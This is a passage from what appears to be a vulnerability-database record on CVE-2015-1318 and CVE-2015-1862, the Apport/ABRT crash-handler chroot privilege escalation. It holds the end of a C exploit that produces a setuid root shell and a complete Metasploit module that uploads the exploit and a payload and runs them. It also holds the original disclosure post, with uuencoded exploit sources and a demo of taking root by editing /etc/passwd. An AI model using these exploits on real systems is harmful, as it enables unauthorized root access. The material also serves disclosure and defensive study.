dynamic segment. Originally I thought just checking AT_BASE would work,\n // but that isnt reliable across many kernels.\n hdr = (void *) getauxval(AT_PHDR);\n\n // If we find any PT_DYNAMIC, then this is probably not a static binary.\n for (i = 0; i < getauxval(AT_PHNUM); i++) {\n if (hdr[i].p_type == PT_DYNAMIC) {\n errx(EXIT_FAILURE, \"you *must* compile with -static\");\n }\n }\n\n // If execution reached here, it looks like we're a static executable. If\n // I'm root, then we've convinced the core handler to run us, so create a\n // setuid root executable that can be used outside the chroot.\n if (getuid() == 0) {\n if (chown(\"sh\", 0, 0) != 0)\n exit(EXIT_FAILURE);\n\n if (chmod(\"sh\", 04755) != 0)\n exit(EXIT_FAILURE);\n\n return EXIT_SUCCESS;\n }\n\n // If I'm not root, but euid is 0, then the exploit worked and we can spawn\n // a shell and cleanup.\n if (setuid(0) == 0) {\n system(\"id\");\n system(\"rm -rf exploit\");\n execlp(\"sh\", \"sh\", NULL);\n\n // Something went wrong.\n err(EXIT_FAILURE, \"failed to spawn root shell, but exploit worked\");\n }\n\n // It looks like the exploit hasn't run yet, so create a chroot.\n if (mkdir(\"exploit\", 0755) != 0\n || mkdir(\"exploit/usr\", 0755) != 0\n || mkdir(\"exploit/usr/share\", 0755) != 0\n || mkdir(\"exploit/usr/share/apport\", 0755) != 0\n || mkdir(\"exploit/usr/libexec\", 0755) != 0) {\n err(EXIT_FAILURE, \"failed to create chroot directory\");\n }\n\n // Create links to the exploit locations we need.\n if (link(*argv, \"exploit/sh\") != 0\n || link(*argv, \"exploit/usr/share/apport/apport\") != 0 // Ubuntu\n || link(*argv, \"exploit/usr/libexec/abrt-hook-ccpp\") != 0) { // Fedora\n err(EXIT_FAILURE, \"failed to create required hard links\");\n }\n\n // Create a subprocess so we don't enter the new namespace.\n if ((wrapper = fork()) == 0) {\n\n // In the child process, create a new pid and user ns. The pid\n // namespace is only needed on Ubuntu, because they check for %P != %p\n // in their core handler. On Fedora, just a user ns is sufficient.\n if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)\n err(EXIT_FAILURE, \"failed to create new namespace\");\n\n // Create a process in the new namespace.\n if ((init = fork()) == 0) {\n\n // Init (pid 1) signal handling is special, so make a subprocess to\n // handle the traps.\n if ((subprocess = fork()) == 0) {\n // Change /proc/self/root, which we can do as we're privileged\n // within the new namepace.\n if (chroot(\"exploit\") != 0) {\n err(EXIT_FAILURE, \"chroot didnt work\");\n }\n\n // Now trap to get the core handler invoked.\n __builtin_trap();\n\n // Shouldn't happen, unless user is ptracing us or something.\n err(EXIT_FAILURE, \"coredump failed, were you ptracing?\");\n }\n\n // If the subprocess exited with an abnormal signal, then everything worked.\n if (waitpid(subprocess, &status, 0) == subprocess) \n return WIFSIGNALED(status)\n ? EXIT_SUCCESS\n : EXIT_FAILURE;\n\n // Something didn't work.\n return EXIT_FAILURE;\n }\n\n // The new namespace didn't work.\n if (waitpid(init, &status, 0) == init)\n return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS\n ? EXIT_SUCCESS\n : EXIT_FAILURE;\n\n // Waitpid failure.\n return EXIT_FAILURE;\n }\n\n // If the subprocess returned sccess, the exploit probably worked, reload\n // with euid zero.\n if (waitpid(wrapper, &status, 0) == wrapper) {\n // All done, spawn root shell.\n if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {\n execl(*argv, \"w00t\", NULL);\n }\n }\n\n // Unknown error.\n errx(EXIT_FAILURE, \"unexpected result, cannot continue\");\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-02-03T08:25:17", "description": "", "cvss3": {}, "published": "2018-02-03T00:00:00", "type": "packetstorm", "title": "Apport / ABRT chroot Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318"], "modified": "2018-02-03T00:00:00", "id": "PACKETSTORM:146235", "href": "https://packetstormsecurity.com/files/146235/Apport-ABRT-chroot-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apport / ABRT chroot Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges on Linux systems by \ninvoking the default coredump handler inside a namespace (\"container\"). \n \nApport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are \nvulnerable, due to a feature which allows forwarding reports to \na container's Apport by changing the root directory before loading \nthe crash report, causing 'usr/share/apport/apport' within the crashed \ntask's directory to be executed. \n \nSimilarly, Fedora is vulnerable when the kernel crash handler is \nconfigured to change root directory before executing ABRT, causing \n'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be \nexecuted. \n \nIn both instances, the crash handler does not drop privileges, \nresulting in code execution as root. \n \nThis module has been tested successfully on Apport 2.14.1 on \nUbuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'StA(c)phane Graber', # Independent discovery, PoC and patch \n'Tavis Ormandy', # Independent discovery and C exploit \n'Ricardo F. Teixeira', # shell exploit \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit \n], \n'DisclosureDate' => 'Mar 31 2015', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'References' => \n[ \n[ 'CVE', '2015-1318' ], \n[ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ], \n# Exploits \n[ 'EDB', '36782' ], \n[ 'EDB', '36746' ], \n[ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ], \n# ABRT (Fedora) \n[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ], \n[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ], \n# Apport (Ubuntu) \n[ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ], \n[ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ], \n[ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ], \n[ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'] \nend \n \ndef check \nkernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first \n \nif kernel_version < Gem::Version.new('3.12') \nvprint_error \"Linux kernel version #{kernel_version} is NOT vulnerable\" \nreturn CheckCode::Safe \nend \n \nvprint_good \"Linux kernel version #{kernel_version} is vulnerable\" \n \nkernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern' \n \n# Vulnerable core_pattern (abrt): \n# kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e \n# Patched systems no longer preface the command with /usr/sbin/chroot \n# kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e \nif kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp') \nvprint_good 'System is configured to chroot ABRT for crash reporting' \nreturn CheckCode::Vulnerable \nend \n \n# Vulnerable core_pattern (apport): \n# kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P \nif kernel_core_pattern.include? 'apport' \nvprint_good 'System is configured to use Apport for crash reporting' \n \nres = cmd_exec 'apport-cli --version' \n \nif res.blank? \nvprint_error 'Apport is NOT installed' \nreturn CheckCode::Safe \nend \n \napport_version = Gem::Version.new(res.split('-').first) \n \nif apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1') \nvprint_good \"Apport version #{apport_version} is vulnerable\" \nreturn CheckCode::Vulnerable \nend \n \nvprint_error \"Apport version #{apport_version} is NOT vulnerable\" \n \nreturn CheckCode::Safe \nend \n \nvprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting' \n \nCheckCode::Safe \nend \n \ndef upload_and_chmodx(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \ncmd_exec \"chmod +x '#{path}'\" \nregister_file_for_cleanup path \nend \n \ndef exploit \nif check != CheckCode::Vulnerable \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \n# Upload Tavis Ormandy's newpid exploit: \n# - https://www.exploit-db.com/exploits/36746/ \n# Cross-compiled with: \n# - i486-linux-musl-cc -static newpid.c \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid' \nfd = ::File.open path, 'rb' \nexecutable_data = fd.read fd.stat.size \nfd.close \n \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nupload_and_chmodx executable_path, executable_data \n \n# Upload payload executable \npayload_name = \".#{rand_text_alphanumeric rand(5..10)}\" \npayload_path = \"#{base_dir}/#{payload_name}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# newpid writes an 'exploit' directory \n# which must be removed manually if exploitation fails \nregister_dir_for_cleanup \"#{base_dir}/exploit\" \n \n# Change working directory to base_dir, \n# allowing newpid to create the required hard links \ncmd_exec \"cd '#{base_dir}'\" \n \nprint_status 'Launching exploit...' \noutput = cmd_exec executable_path \noutput.each_line { |line| vprint_status line.chomp } \n \n# Check for root privileges \nid = cmd_exec 'id' \n \nunless id.include? 'root' \nfail_with Failure::Unknown, 'Failed to gain root privileges' \nend \n \nprint_good 'Upgraded session to root privileges' \nvprint_line id \n \n# Execute payload executable \nvprint_status 'Executing payload...' \ncmd_exec payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146235/apport_abrt_chroot_priv_esc.rb.txt"}, {"lastseen": "2016-12-05T22:17:16", "description": "", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "packetstorm", "title": "Abrt / Apport Race Condition / Symlink", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318", "CVE-2015-1862"], "modified": "2015-04-15T00:00:00", "id": "PACKETSTORM:131429", "href": "https://packetstormsecurity.com/files/131429/Abrt-Apport-Race-Condition-Symlink.html", "sourceData": "`Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in \ntwo different implementations, apport and abrt respectively). These were \ndiscussed on the vendors list last week. \n \nIf the first character of kern.core_pattern sysctl is a pipe, the kernel \nwill invoke the specified program, and pass it the core on stdin. Apport \n(Ubuntu) and Abrt (Fedora) use this feature to analyze and log crashes. \n \nSince the introduction of containers, Abrt and Apport have attempted to \ntransparently handle namespaces by chrooting into the same root as the \ncrashing program [1] [2]. Unfortunately, this is incorrect because root \ncannot safely execve() after a chroot into a user specified directory. \n \nFurthermore, Abrt suffers from numerous race conditions and symlink problems \nfrom trusting unprivileged programs. For example, the code below (and lots \nof similar code) is vulnerable to a filesystem race where a user unlinks the \nfile after the copy but before the chown. \n \nhttps://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L634 \n \nstrcpy(source_filename + source_base_ofs, \"maps\"); \nstrcpy(dest_base, FILENAME_MAPS); \ncopy_file(source_filename, dest_filename, DEFAULT_DUMP_DIR_MODE); \nIGNORE_RESULT(chown(dest_filename, dd->dd_uid, dd->dd_gid)); \n \nThis code trusts various symlinks in /tmp without validation: \n \nhttps://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L806 \n \nchar *java_log = xasprintf(\"/tmp/jvm-%lu/hs_error.log\", (long)pid); \nint src_fd = open(java_log, O_RDONLY); \nfree(java_log); \n \nThis code trusts the /proc/pid/exe symlink, even though it is possible to \nlink it anywhere you want. \n \nhttps://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L368 \n \nsprintf(buf, \"/proc/%lu/exe\", (long)pid); \nint src_fd_binary = open(buf, O_RDONLY); /* might fail and \nreturn -1, it's ok */ \n \nThis code trusts the attacker controlled root symlink and copies files from \nit. \n \nhttps://github.com/abrt/libreport/blob/master/src/lib/dump_dir.c#L671 \n \nif (chroot_dir) \ncopy_file_from_chroot(dd, FILENAME_OS_INFO_IN_ROOTDIR, \nchroot_dir, \"/etc/os-release\"); \n \nThis instructs librpm to trust an unprivileged root symlink: \n \nhttps://github.com/abrt/abrt/blob/master/src/daemon/rpm.c#L184 \n \nif (rpmtsSetRootDir(*ts, rootdir_or_NULL) != 0) \n{ \nrpmtsFree(*ts); \nreturn -1; \n} \n \nAnd so on. \n \nThere are other automatic crash analysis scripts, I believe systemd also has \none - I haven't looked at it all. \n \nWORKAROUND \n \nI highly recommend setting `sysctl -w kern.core_pattern=core`. \n \nEXPLOITATION \n \nTwo demonstration exploits are attached. \n \nThe file `newpid.c` should produce a root shell on Fedora 20 or Ubuntu by \ninvoking the crash handler inside an unprivileged chroot (possible since \nkernel 3.8). \n \n$ gcc -static newpid.c \n$ ./a.out \nuid=0(root) gid=0(root) groups=0(root) \nsh-4.3# exit \nexit \n \nThe file `raceabrt.c` should make you the owner of any file on Fedora by \nracing the Abrt report creation. \n \n$ cat /etc/fedora-release \nFedora release 21 (Twenty One) \n$ ./a.out /etc/passwd \nDetected ccpp-2015-04-13-17:40:31-5506.new, attempting to race... \n[ wait a few minutes ] \nexploit successful... \n-rw-r--r--. 1 taviso abrt 2421 Apr 13 11:15 /etc/passwd \n \nIn case it isn't obvious, you can then give yourself uid zero. \n \n$ getent passwd taviso \ntaviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash \n$ vi /etc/passwd \n$ getent passwd taviso \ntaviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash \n$ su taviso \nPassword: \n# id \nuid=0(root) gid=0(root) groups=0(root) \nexit \n \nREFERENCES \n \n[1] https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893 \n[2] https://github.com/abrt/abrt/pull/810 \n[3] http://man7.org/linux/man-pages/man7/user_namespaces.7.html \n \nCREDIT \n \nTavis Ormandy, Google Project Zero. \n \n \nbegin 644 newpid.c \nM(V1E9FEN92!?1TY57U-/55)#10HC:6YC;'5D92`\\<W1D:6\\N:#X*(VEN8VQU \nM9&4@/'5N:7-T9\"YH/@HC:6YC;'5D92`\\<W1D;&EB+F@^\"B-I;F-L=61E(#QF \nM8VYT;\"YH/@HC:6YC;'5D92`\\<VEG;F%L+F@^\"B-I;F-L=61E(#QE;&8N:#X* \nM(VEN8VQU9&4@/&5R<BYH/@HC:6YC;'5D92`\\<WES;&]G+F@^\"B-I;F-L=61E \nM(#QS8VAE9\"YH/@HC:6YC;'5D92`\\;&EN=7@O<V-H960N:#X*(VEN8VQU9&4@ \nM/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92`\\<WES+W-T870N:#X*(VEN8VQU9&4@ \nM/'-Y<R]A=7AV+F@^\"B-I;F-L=61E(#QS>7,O=V%I=\"YH/@H*(R!W87)N:6YG \nM('1H:7,@9FEL92!M=7-T(&)E(&-O;7!I;&5D('=I=&@@+7-T871I8PH*+R\\* \nM+R\\@07!P;W)T+T%B<G0@5G5L;F5R86)I;&ET>2!$96UO($5X<&QO:70N\"B\\O \nM\"B\\O(\"!!<'!O<G0Z($-612TR,#$U+3$S,3@*+R\\@($%B<G0Z(\"`@0U9%+3(P \nM,34M,3@V,@HO+R`*+R\\@(\"`M+2!T879I<V]`8VUP>&-H9SAB+F-O;2P@07!R \nM:6P@,C`Q-2X*+R\\*+R\\@)\"!G8V,@+7-T871I8R!N97=P:60N8PHO+R`D(\"XO \nM82YO=70*+R\\@=6ED/3`H<F]O=\"D@9VED/3`H<F]O=\"D@9W)O=7!S/3`H<F]O \nM=\"D*+R\\@<V@M-\"XS(R!E>&ET\"B\\O(&5X:70*+R\\*+R\\@2&EN=#H@5&\\@9V5T \nM(&QI8F,N82P*+R\\@('EU;2!I;G-T86QL(&=L:6)C+7-T871I8R!O<B!A<'0M \nM9V5T(&EN<W1A;&P@;&EB8S8M9&5V\"B\\O\"@II;G0@;6%I;BAI;G0@87)G8RP@ \nM8VAA<B`J*F%R9W8I\"GL*(\"`@(&EN=\"!S=&%T=7,[\"B`@(\"!%;&8S,E]0:&1R \nM(\"IH9'([\"B`@(\"!P:61?=\"!W<F%P<&5R.PH@(\"`@<&ED7W0@:6YI=#L*(\"`@ \nM('!I9%]T('-U8G!R;V-E<W,[\"B`@(\"!U;G-I9VYE9\"!I.PH*(\"`@(\"\\O(%9E \nM<FEF>2!T:&ES(&ES(&$@<W1A=&EC(&5X96-U=&%B;&4@8GD@8VAE8VMI;F<@ \nM=&AE('!R;V=R86T@:&5A9&5R<R!F;W(@80H@(\"`@+R\\@9'EN86UI8R!S96=M \nM96YT+B!/<FEG:6YA;&QY($D@=&AO=6=H=\"!J=7-T(&-H96-K:6YG($%47T)! \nM4T4@=V]U;&0@=V]R:RP*(\"`@(\"\\O(&)U=\"!T:&%T(&ES;G0@<F5L:6%B;&4@ \nM86-R;W-S(&UA;GD@:V5R;F5L<RX*(\"`@(&AD<B`](\"AV;VED(\"HI(&=E=&%U \nM>'9A;\"A!5%]02$12*3L*\"B`@(\"`O+R!)9B!W92!F:6YD(&%N>2!05%]$64Y! \nM34E#+\"!T:&5N('1H:7,@:7,@<')O8F%B;'D@;F]T(&$@<W1A=&EC(&)I;F%R \nM>2X*(\"`@(&9O<B`H:2`](#`[(&D@/\"!G971A=7AV86PH051?4$A.54TI.R!I \nM*RLI('L*(\"`@(\"`@(\"!I9B`H:&1R6VE=+G!?='EP92`]/2!05%]$64Y!34E# \nM*2![\"B`@(\"`@(\"`@(\"`@(&5R<G@H15A)5%]&04E,55)%+\"`B>6]U(\"IM=7-T \nM*B!C;VUP:6QE('=I=&@@+7-T871I8R(I.PH@(\"`@(\"`@('T*(\"`@('T*\"B`@ \nM(\"`O+R!)9B!E>&5C=71I;VX@<F5A8VAE9\"!H97)E+\"!I=\"!L;V]K<R!L:6ME \nM('=E)W)E(&$@<W1A=&EC(&5X96-U=&%B;&4N($EF\"B`@(\"`O+R!))VT@<F]O \nM=\"P@=&AE;B!W92=V92!C;VYV:6YC960@=&AE(&-O<F4@:&%N9&QE<B!T;R!R \nM=6X@=7,L('-O(&-R96%T92!A\"B`@(\"`O+R!S971U:60@<F]O=\"!E>&5C=71A \nM8FQE('1H870@8V%N(&)E('5S960@;W5T<VED92!T:&4@8VAR;V]T+@H@(\"`@ \nM:68@*&=E='5I9\"@I(#T](#`I('L*(\"`@(\"`@(\"!I9B`H8VAO=VXH(G-H(BP@ \nM,\"P@,\"D@(3T@,\"D*(\"`@(\"`@(\"`@(\"`@97AI=\"A%6$E47T9!24Q54D4I.PH* \nM(\"`@(\"`@(\"!I9B`H8VAM;V0H(G-H(BP@,#0W-34I(\"$](#`I\"B`@(\"`@(\"`@ \nM(\"`@(&5X:70H15A)5%]&04E,55)%*3L*\"B`@(\"`@(\"`@<F5T=7)N($58251? \nM4U5#0T534SL*(\"`@('T*\"B`@(\"`O+R!)9B!))VT@;F]T(')O;W0L(&)U=\"!E \nM=6ED(&ES(#`L('1H96X@=&AE(&5X<&QO:70@=V]R:V5D(&%N9\"!W92!C86X@ \nM<W!A=VX*(\"`@(\"\\O(&$@<VAE;&P@86YD(&-L96%N=7`N\"B`@(\"!I9B`H<V5T \nM=6ED*#`I(#T](#`I('L*(\"`@(\"`@(\"!S>7-T96TH(FED(BD[\"B`@(\"`@(\"`@ \nM<WES=&5M*\")R;2`M<F8@97AP;&]I=\"(I.PH@(\"`@(\"`@(&5X96-L<\"@B<V@B \nM+\"`B<V@B+\"!.54Q,*3L*\"B`@(\"`@(\"`@+R\\@4V]M971H:6YG('=E;G0@=W)O \nM;F<N\"B`@(\"`@(\"`@97)R*$58251?1D%)3%5212P@(F9A:6QE9\"!T;R!S<&%W \nM;B!R;V]T('-H96QL+\"!B=70@97AP;&]I=\"!W;W)K960B*3L*(\"`@('T*\"B`@ \nM(\"`O+R!)=\"!L;V]K<R!L:6ME('1H92!E>'!L;VET(&AA<VXG=\"!R=6X@>65T \nM+\"!S;R!C<F5A=&4@82!C:')O;W0N\"B`@(\"!I9B`H;6MD:7(H(F5X<&QO:70B \nM+\"`P-S4U*2`A/2`P\"B`@(\"`@?'P@;6MD:7(H(F5X<&QO:70O=7-R(BP@,#<U \nM-2D@(3T@,`H@(\"`@('Q\\(&UK9&ER*\")E>'!L;VET+W5S<B]S:&%R92(L(#`W \nM-34I(\"$](#`*(\"`@(\"!\\?\"!M:V1I<B@B97AP;&]I=\"]U<W(O<VAA<F4O87!P \nM;W)T(BP@,#<U-2D@(3T@,`H@(\"`@('Q\\(&UK9&ER*\")E>'!L;VET+W5S<B]L \nM:6)E>&5C(BP@,#<U-2D@(3T@,\"D@>PH@(\"`@(\"`@(&5R<BA%6$E47T9!24Q5 \nM4D4L(\")F86EL960@=&\\@8W)E871E(&-H<F]O=\"!D:7)E8W1O<GDB*3L*(\"`@ \nM('T*\"B`@(\"`O+R!#<F5A=&4@;&EN:W,@=&\\@=&AE(&5X<&QO:70@;&]C871I \nM;VYS('=E(&YE960N\"B`@(\"!I9B`H;&EN:R@J87)G=BP@(F5X<&QO:70O<V@B \nM*2`A/2`P\"B`@(\"`@?'P@;&EN:R@J87)G=BP@(F5X<&QO:70O=7-R+W-H87)E \nM+V%P<&]R=\"]A<'!O<G0B*2`A/2`P(\"`@(\"`@(\"`O+R!58G5N='4*(\"`@(\"!\\ \nM?\"!L:6YK*\"IA<F=V+\"`B97AP;&]I=\"]U<W(O;&EB97AE8R]A8G)T+6AO;VLM \nM8V-P<\"(I(\"$](#`I('L@(\"\\O($9E9&]R80H@(\"`@(\"`@(&5R<BA%6$E47T9! \nM24Q54D4L(\")F86EL960@=&\\@8W)E871E(')E<75I<F5D(&AA<F0@;&EN:W,B \nM*3L*(\"`@('T*\"B`@(\"`O+R!#<F5A=&4@82!S=6)P<F]C97-S('-O('=E(&1O \nM;B=T(&5N=&5R('1H92!N97<@;F%M97-P86-E+@H@(\"`@:68@*\"AW<F%P<&5R \nM(#T@9F]R:R@I*2`]/2`P*2![\"@H@(\"`@(\"`@(\"\\O($EN('1H92!C:&EL9\"!P \nM<F]C97-S+\"!C<F5A=&4@82!N97<@<&ED(&%N9\"!U<V5R(&YS+B!4:&4@<&ED \nM\"B`@(\"`@(\"`@+R\\@;F%M97-P86-E(&ES(&]N;'D@;F5E9&5D(&]N(%5B=6YT \nM=2P@8F5C875S92!T:&5Y(&-H96-K(&9O<B`E4\"`A/2`E<`H@(\"`@(\"`@(\"\\O \nM(&EN('1H96ER(&-O<F4@:&%N9&QE<BX@3VX@1F5D;W)A+\"!J=7-T(&$@=7-E \nM<B!N<R!I<R!S=69F:6-I96YT+@H@(\"`@(\"`@(&EF(\"AU;G-H87)E*$-,3TY% \nM7TY%5U!)1\"!\\($-,3TY%7TY%5U5315(I(\"$](#`I\"B`@(\"`@(\"`@(\"`@(&5R \nM<BA%6$E47T9!24Q54D4L(\")F86EL960@=&\\@8W)E871E(&YE=R!N86UE<W!A \nM8V4B*3L*\"B`@(\"`@(\"`@+R\\@0W)E871E(&$@<')O8V5S<R!I;B!T:&4@;F5W \nM(&YA;65S<&%C92X*(\"`@(\"`@(\"!I9B`H*&EN:70@/2!F;W)K*\"DI(#T](#`I \nM('L*\"B`@(\"`@(\"`@(\"`@(\"\\O($EN:70@*'!I9\"`Q*2!S:6=N86P@:&%N9&QI \nM;F<@:7,@<W!E8VEA;\"P@<V\\@;6%K92!A('-U8G!R;V-E<W,@=&\\*(\"`@(\"`@ \nM(\"`@(\"`@+R\\@:&%N9&QE('1H92!T<F%P<RX*(\"`@(\"`@(\"`@(\"`@:68@*\"AS \nM=6)P<F]C97-S(#T@9F]R:R@I*2`]/2`P*2![\"B`@(\"`@(\"`@(\"`@(\"`@(\"`O \nM+R!#:&%N9V4@+W!R;V,O<V5L9B]R;V]T+\"!W:&EC:\"!W92!C86X@9&\\@87,@ \nM=V4G<F4@<')I=FEL96=E9`H@(\"`@(\"`@(\"`@(\"`@(\"`@+R\\@=VET:&EN('1H \nM92!N97<@;F%M97!A8V4N\"B`@(\"`@(\"`@(\"`@(\"`@(\"!I9B`H8VAR;V]T*\")E \nM>'!L;VET(BD@(3T@,\"D@>PH@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(&5R<BA%6$E4 \nM7T9!24Q54D4L(\")C:')O;W0@9&ED;G0@=V]R:R(I.PH@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@?0H*(\"`@(\"`@(\"`@(\"`@(\"`@(\"\\O($YO=R!T<F%P('1O(&=E=\"!T:&4@ \nM8V]R92!H86YD;&5R(&EN=F]K960N\"B`@(\"`@(\"`@(\"`@(\"`@(\"!?7V)U:6QT \nM:6Y?=')A<\"@I.PH*(\"`@(\"`@(\"`@(\"`@(\"`@(\"\\O(%-H;W5L9&XG=\"!H87!P \nM96XL('5N;&5S<R!U<V5R(&ES('!T<F%C:6YG('5S(&]R('-O;65T:&EN9RX* \nM(\"`@(\"`@(\"`@(\"`@(\"`@(&5R<BA%6$E47T9!24Q54D4L(\")C;W)E9'5M<\"!F \nM86EL960L('=E<F4@>6]U('!T<F%C:6YG/R(I.PH@(\"`@(\"`@(\"`@(\"!]\"@H@ \nM(\"`@(\"`@(\"`@(\"`O+R!)9B!T:&4@<W5B<')O8V5S<R!E>&ET960@=VET:\"!A \nM;B!A8FYO<FUA;\"!S:6=N86PL('1H96X@979E<GET:&EN9R!W;W)K960N\"B`@ \nM(\"`@(\"`@(\"`@(&EF(\"AW86ET<&ED*'-U8G!R;V-E<W,L(\"9S=&%T=7,L(#`I \nM(#T]('-U8G!R;V-E<W,I(\"`@(`H@(\"`@(\"`@(\"`@(\"`@(\"`@<F5T=7)N(%=) \nM1E-)1TY!3$5$*'-T871U<RD*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@/R!% \nM6$E47U-50T-%4U,*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@.B!%6$E47T9! \nM24Q54D4[\"@H@(\"`@(\"`@(\"`@(\"`O+R!3;VUE=&AI;F<@9&ED;B=T('=O<FLN \nM\"B`@(\"`@(\"`@(\"`@(')E='5R;B!%6$E47T9!24Q54D4[\"B`@(\"`@(\"`@?0H* \nM(\"`@(\"`@(\"`O+R!4:&4@;F5W(&YA;65S<&%C92!D:61N)W0@=V]R:RX*(\"`@ \nM(\"`@(\"!I9B`H=V%I='!I9\"AI;FET+\"`F<W1A='5S+\"`P*2`]/2!I;FET*0H@ \nM(\"`@(\"`@(\"`@(\"!R971U<FX@5TE&15A)5$5$*'-T871U<RD@)B8@5T582513 \nM5$%455,H<W1A='5S*2`]/2!%6$E47U-50T-%4U,*(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"`_($58251?4U5#0T534PH@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(#H@15A) \nM5%]&04E,55)%.PH*(\"`@(\"`@(\"`O+R!786ET<&ED(&9A:6QU<F4N\"B`@(\"`@ \nM(\"`@<F5T=7)N($58251?1D%)3%5213L*(\"`@('T*\"B`@(\"`O+R!)9B!T:&4@ \nM<W5B<')O8V5S<R!R971U<FYE9\"!S8V-E<W,L('1H92!E>'!L;VET('!R;V)A \nM8FQY('=O<FME9\"P@<F5L;V%D\"B`@(\"`O+R!W:71H(&5U:60@>F5R;RX*(\"`@ \nM(&EF(\"AW86ET<&ED*'=R87!P97(L(\"9S=&%T=7,L(#`I(#T]('=R87!P97(I \nM('L*(\"`@(\"`@(\"`O+R!!;&P@9&]N92P@<W!A=VX@<F]O=\"!S:&5L;\"X*(\"`@ \nM(\"`@(\"!I9B`H5TE&15A)5$5$*'-T871U<RD@)B8@5T5825135$%455,H<W1A \nM='5S*2`]/2`P*2![\"B`@(\"`@(\"`@(\"`@(&5X96-L*\"IA<F=V+\"`B=S`P=\"(L \nM($Y53$PI.PH@(\"`@(\"`@('T*(\"`@('T*\"B`@(\"`O+R!5;FMN;W=N(&5R<F]R \nM+@H@(\"`@97)R>\"A%6$E47T9!24Q54D4L(\")U;F5X<&5C=&5D(')E<W5L=\"P@ \n58V%N;F]T(&-O;G1I;G5E(BD[\"GT* \n` \nend \n \nbegin 644 raceabrt.c \nM(VEN8VQU9&4@/'-T9&QI8BYH/@HC:6YC;'5D92`\\=6YI<W1D+F@^\"B-I;F-L \nM=61E(#QS=&1B;V]L+F@^\"B-I;F-L=61E(#QS=&1I;RYH/@HC:6YC;'5D92`\\ \nM<VEG;F%L+F@^\"B-I;F-L=61E(#QE<G(N:#X*(VEN8VQU9&4@/'-T<FEN9RYH \nM/@HC:6YC;'5D92`\\86QL;V-A+F@^\"B-I;F-L=61E(#QL:6UI=',N:#X*(VEN \nM8VQU9&4@/'-Y<R]I;F]T:69Y+F@^\"B-I;F-L=61E(#QS>7,O<')C=&PN:#X* \nM(VEN8VQU9&4@/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92`\\<WES+W1Y<&5S+F@^ \nM\"B-I;F-L=61E(#QS>7,O=V%I=\"YH/@HC:6YC;'5D92`\\<WES+W-T870N:#X* 